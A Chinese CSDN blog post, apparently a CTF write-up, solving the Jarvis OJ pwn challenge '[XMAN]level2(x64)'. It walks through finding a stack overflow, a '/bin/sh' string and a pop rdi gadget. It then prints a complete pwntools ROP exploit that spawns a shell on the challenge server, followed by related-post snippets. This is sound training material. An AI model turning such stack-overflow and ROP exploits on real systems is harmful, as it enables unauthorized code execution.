[Jarvis OJ - PWN]——[XMAN]level2(x64)

最新推荐文章于 2021-05-13 12:59:28 发布
最新推荐文章于 2021-05-13 12:59:28 发布
阅读量530 收藏
点赞数
分类专栏: # Jarvis OJ
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/113589550
版权

[Jarvis OJ - PWN]——[XMAN]level2(x64)

  • 题目地址:https://www.jarvisoj.com/challenges
  • 题目:
    在这里插入图片描述
    checksec一下,是64位程序。开启了NX保护在这里插入图片描述
    在IDA看一下,main函数中有我们要的system函数,
    在这里插入图片描述
    vulnerable_function函数中也有。不过可惜参数都不对,任取一个system地址就好就好。但是我们找到了栈溢出的利用函数read。buf距离rbp的距离为0x80
    在这里插入图片描述
    请添加图片描述请添加图片描述请添加图片描述

查找一下看看有没有**"/bin/sh"字符串,发现地址在0x0600A90**
在这里插入图片描述

**因为是64位程序,所以函数的前六个参数依次会使用rdi、rsi、rdx、rcx、r8、r9寄存器进行传递。system只有一个参数,使用的寄存器是rdi。**查找一下汇编指令pop rdi的地址,0x04006b3
在这里插入图片描述
所以exploit为

from pwn import *
p = remote("pwn2.jarvisoj.com",9882)
binsh = 0x0600A90
pop_rdi=0x04006b3
sys = 0x0400603 #0x040063E 0x04004C0 
payload = 'a'*(0x80 + 0x8)
payload += p64(pop_rdi)+ p64(binsh) #将"/bin/sh"pop到rdi寄存器中
payload += p64(sys) #执行system函数
p.recvline()
p.sendline(payload)
p.interactive()
Y-peak
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
18.9.19 Jarvis OJ PWN----[XMAN]level2(x64)
qq_42192672的博客
09-19 288
先checksec一下 可以栈溢出,我们可以看到文件里有system函数,有/bin/sh字符串,美滋滋 64位函数的参数传递顺序和32位不同,传参顺序:rdi,rsi,rdx,rcx,r8,r9,栈,所以要把\bin\sh的地址放到rdi里 找一下可溢出的地方,在read函数里 关键点其实就是找出rdi地址(参考大佬的教学) 指令语句:ROPgadget --binary le...
PWN_JarvisOJ_Level2_x64
michaelinfinity的博客
03-16 1408
关于level2我就不多做赘述了。这道题和level2之间的区别就是一个是32位的栈溢出,另一个就是64位的栈溢出。 32位的函数在调用栈的时候是: 调用函数地址->函数的返回地址->参数n->参数n-1....->参数1 64位的函数在调用栈的时候是: 前六个参数按照约定存储在寄存器:rdi,rsi,rdx,rcx,r8,r9中。 ...
CTF-PWN-level2(x64)(Jarvis OJ)
SuperGate的博客
02-15 495
这道题和level2的32位版本的漏洞一样,不过32位程序函数的参数是压在栈中的,而64位程序的前6个参数是存在寄存器中的,第7个开始才压入栈中。 由于我们的目的是将system函数的参数改为/bin/sh,所以我们考虑用pop edi ret 语句将字符串赋值给edi。 同样的,程序中hint存入了/bin/sh,我们直接使用即可。 system函数的地址也很容易获得,剩下的就是pop e...
jarvisoj_level2_x64
、moddemod
06-17 526
exp #!/usr/bin/env python3 # coding=utf-8 from pwn import * context(log_level = 'debug') proc_name = './level2_x64' p =process(proc_name) p = remote('node3.buuoj.cn', 25838) elf = ELF(proc_name) system_addr = elf.sym['system'] bin_sh_str = 0x600a90 pop..
CTF PWN [XMAN]level2(x64)
qq_41743240的博客
04-08 385
CTF PWN [XMAN]level2(x64) 题目地址 首先进行checksec保护机制的查询 发现只开了NX,所以不能利用shellcode方式获取shell,这里采用ROP方式获取shell IDA反编译查看伪源码 程序非常简单,两个函数 main: vulnerable_function: 在vulnerable_function有个问题,buf申请空间为0x80字节,然而可以读...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
JarvisAlgorithm:Jarvis算法-Java
03-06
Jarvis算法,又称礼品包装算法,是计算几何领域中用于寻找给定点集的凸包的经典算法。这个算法由Marvin Jarvis于1973年提出,主要用于处理二维空间中的点集问题。在Java编程语言中,我们可以实现这个算法来创建一个...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
leetcode刷题_OJ 88
cyanchen666的博客
07-27 1435
Given two sorted integer arrays nums1 and nums2, merge nums2 into nums1 as one sorted array. Note: The number of elements initialized in nums1 and nums2 are m and n respectively. You may assume that...
Bugku CTF Web16 WP
u011250160的博客
04-21 1077
这道题本身不是多难,但还是想写篇文章记录一下 首先我是用dirsearch扫了一下敏感文件 然后访问了index.php.bak得到代码 提示:index.php.bak最上头说明是用phpstrom写的 phpstrom的项目会自动添加文件夹.idea,里面的文件可能会造成信息泄露 include_once "flag.php"; ini_set("display_errors", 0); $str = strstr($_SERVER['REQUEST_URI'], '?');//得到我们传递进去的参数
Bugku Web33
JJT
05-13 230
Bugku Web33 描述:fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA= 下载文件,是一段php代码,提示给的字符串应该就是flag加密后得到的字符串,现在需要对其解密,得到flag,代码如下 <?php function encrypt($data,$key) { $key = md5('ISCC'); #729623334f0aa2784a1599fd374c120d $x = 0; $len = strle
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1409
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
Jarvis OJ [XMAN]level2(x64)
九层台
07-07 1143
liu@liu-F117-F:~/桌面/oj/level2_x64$ checksec level2_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level2_x64/level2_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
开题报告达达宠物认领信息站的设计与实现 已通过开题答辩的.docx
07-25
宠物认领信息站的主要目的是为寻找宠物的失主和寻找新家的宠物提供一个在线的信息交流平台。通过这个平台,失主可以发布失宠信息,寻找走失或遗弃的宠物;而救助人或组织则可以发布待领养的宠物信息,为那些无家可归的宠物寻找一个永久的归宿。 这样的站通常会提供一个详细的宠物数据库,包括照片、品种、年龄、健康状况等信息,以便让失主能够方便地找到自己的宠物。同时,站还会提供一些相关的服务,如失主与救助人之间的在线交流、宠物匹配推荐、领养手续办理等,以帮助双方顺利完成宠物的认领和领养过程。 宠物认领信息站的目的在于提高失宠找到宠物的几率,减少流浪宠物的数量,并为那些无家可归的宠物提供一个温馨的新家。同时,站还能促进社会对流浪宠物的关注和保护,提高人们的动物保护意识。
开题报告创权法律服务系统 已通过开题答辩的.doc
07-25
进入20世纪80年代,我国加快了改革开放的步伐,市场经济体制已逐步形成,我国的经济发展受世人所瞩目,但法律法规的置后,使经济发展不规范问题暴露的相当严重,特别是社会整体信用的缺失,使消费环境不断恶化。而如今随着城镇化的高速推进,精神追求远不及物质发展迅速,维权问题也越来越成为人们十分关注的社会话题。 维权是指维护个人或群体的合法权益,范围包括人身损害、土地纠纷、 医疗事故、婚姻、家庭、继承等民事纠纷所进行的行政及司法诉讼。维护消费者合法权益关系着全社会每个人的利益,群众利益无小事。维护消费者合法权益正体现着“权为民所用,利为民所谋”。而现如今由于法律规则的不完善加上自身对法律知识的不了解,导致很多公民的权益问题在复杂的社会情况下无法得到妥善的解决,使得公民的财产和心理受到难以弥补的损失,严重威胁到社会的安全与稳定,公民之间的诚信与统一。因此更便捷、迅速地维护公民的合法权益,已经成为了一个刻不容缓去解决的社会问题。
Matlab实现豪猪优化算法CPO-TCN-Multihead-Attention多输入单输出回归预测算法研究.rar
最新发布
07-25
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
人力资源-6 团结一致共创未来新员工座谈会.pptx
07-25
人力资源-6 团结一致共创未来新员工座谈会.pptx
jarvisoj_level2
08-13
- *1* *3* [jarvisoj_level2_x64](https://blog.csdn.net/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值